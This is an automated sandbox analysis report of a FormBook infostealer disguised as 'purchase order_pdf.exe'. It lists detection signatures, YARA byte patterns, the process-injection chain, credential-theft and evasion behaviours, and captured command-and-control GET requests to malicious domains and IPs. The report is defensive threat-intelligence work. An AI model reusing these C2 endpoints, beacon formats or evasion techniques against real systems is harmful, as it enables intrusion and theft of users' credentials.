Edit tour

Windows Analysis Report
purchase order_pdf.exe

Overview

General Information

Sample name:	purchase order_pdf.exe
Analysis ID:	1468882
MD5:	83256eb2c9ef7f753415482f83d9de5f
SHA1:	291d887c77b83ac8b9cfdcaa83ad21e73d848e2a
SHA256:	b120ca208b2c4d598b7bfd471db7dfd89eda1403c0197424cda17b321492bcef
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

purchase order_pdf.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\purchase order_pdf.exe" MD5: 83256EB2C9EF7F753415482F83D9DE5F)

svchost.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\purchase order_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

PIrlNRZFMoz.exe (PID: 3732 cmdline: "C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

isoburn.exe (PID: 7708 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)

PIrlNRZFMoz.exe (PID: 4584 cmdline: "C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2acb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2acb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2acb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3c8b1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x25dc0:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x684669:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x66db78:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e763:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17c72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2acb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x684669:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x66db78:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d963:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e763:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17c72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\purchase order_pdf.exe", CommandLine: "C:\Users\user\Desktop\purchase order_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order_pdf.exe", ParentImage: C:\Users\user\Desktop\purchase order_pdf.exe, ParentProcessId: 7280, ParentProcessName: purchase order_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\purchase order_pdf.exe", ProcessId: 7296, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\purchase order_pdf.exe", CommandLine: "C:\Users\user\Desktop\purchase order_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order_pdf.exe", ParentImage: C:\Users\user\Desktop\purchase order_pdf.exe, ParentProcessId: 7280, ParentProcessName: purchase order_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\purchase order_pdf.exe", ProcessId: 7296, ProcessName: svchost.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.43.94.40

Timestamp:	07/08/24-07:20:11.848902
SID:	2855465
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 103.176.91.154

Timestamp:	07/08/24-07:22:37.893135
SID:	2855465
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	07/08/24-07:21:05.103706
SID:	2855465
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 203.161.41.207

Timestamp:	07/08/24-07:20:38.705767
SID:	2855465
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	07/08/24-07:22:11.489640
SID:	2855465
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 51.89.93.193

Timestamp:	07/08/24-07:21:18.222792
SID:	2855465
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	07/08/24-07:21:31.503998
SID:	2855465
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 45.130.41.38

Timestamp:	07/08/24-07:21:58.047710
SID:	2855465
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	07/08/24-07:19:48.203265
SID:	2855465
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	07/08/24-07:20:51.977652
SID:	2855465
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/08/24-07:21:44.616017
SID:	2855465
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	07/08/24-07:22:24.783779
SID:	2855465
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 5.78.41.174

Timestamp:	07/08/24-07:22:51.457643
SID:	2855465
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 37.9.175.173

Timestamp:	07/08/24-07:20:25.361834
SID:	2855465
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: purchase order_pdf.exe	Virustotal: Detection: 27%			Perma Link
Source: purchase order_pdf.exe	ReversingLabs: Detection: 31%

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: purchase order_pdf.exe

Joe Sandbox ML: detected

Source: purchase order_pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: isoburn.pdb source: svchost.exe, 00000001.00000003.2034368078.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2034457956.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PIrlNRZFMoz.exe, 00000005.00000002.4111492414.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: isoburn.pdbGCTL source: svchost.exe, 00000001.00000003.2034368078.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2034457956.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PIrlNRZFMoz.exe, 00000005.00000002.4111492414.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PIrlNRZFMoz.exe, 00000005.00000002.4111690233.0000000000ECE000.00000002.00000001.01000000.00000005.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4111085780.0000000000ECE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: purchase order_pdf.exe, 00000000.00000003.1646546825.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, purchase order_pdf.exe, 00000000.00000003.1646007656.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2065388310.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2065388310.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1974218775.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1972312797.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2067376989.0000000004DBA000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112414330.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2065445082.0000000004C0E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112414330.00000000050FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: purchase order_pdf.exe, 00000000.00000003.1646546825.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, purchase order_pdf.exe, 00000000.00000003.1646007656.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2065388310.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2065388310.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1974218775.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1972312797.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000003.2067376989.0000000004DBA000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112414330.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2065445082.0000000004C0E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112414330.00000000050FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: isoburn.exe, 00000006.00000002.4111352732.0000000003287000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112853127.000000000558C000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000000.2132339708.000000000341C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2350658755.000000002FF6C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: isoburn.exe, 00000006.00000002.4111352732.0000000003287000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112853127.000000000558C000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000000.2132339708.000000000341C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2350658755.000000002FF6C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008D4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_008D4696
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_008DC9C7
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DC93C FindFirstFileW,FindClose,	0_2_008DC93C
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_008DF200
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_008DF35D
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_008DF65E
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008D3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008D3A2B
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008D3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008D3D4E
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_008DBF27
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D5BF20 FindFirstFileW,FindNextFileW,FindClose,	6_2_02D5BF20

Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 4x nop then xor eax, eax		6_2_02D49790
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 4x nop then mov ebx, 00000004h		6_2_04DB053E

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49736 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49741 -> 162.43.94.40:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 37.9.175.173:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 203.161.41.207:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49757 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49761 -> 51.89.93.193:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49765 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49769 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49773 -> 45.130.41.38:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49777 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49781 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49785 -> 103.176.91.154:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49789 -> 5.78.41.174:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.hectmalt.xyz

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: PARSONLINETehran-IRANIR PARSONLINETehran-IRANIR
Source: Joe Sandbox View	ASN Name: CYBERTRAILSUS CYBERTRAILSUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008E25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_008E25E2

Source: global traffic	HTTP traffic detected: GET /b58q/?MdEl=9y3r5r666D9AuSqfLzxakfc3WeHGC1b3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iIz6r0aAJ1Bk1DmI4olH2PPKy4iCHNw8YI/w=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.yexz60.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /5mht/?MdEl=Z08L+geXOaCZa14tX+Dce5rz8Tb3SFKzhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWLTcISJV/mUGk7GPA31V4F2pYJx4Wp0unWNc=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.sodnavisystem.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /9v4b/?MdEl=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.gymroom.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /9ntw/?MdEl=DF4c4jTIr0uCfSFFw8k7okOaWiqusMuq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUX+A+cKpzBpqYQsgpzguPUBB/nrPxtt52Xac=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.hectmalt.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
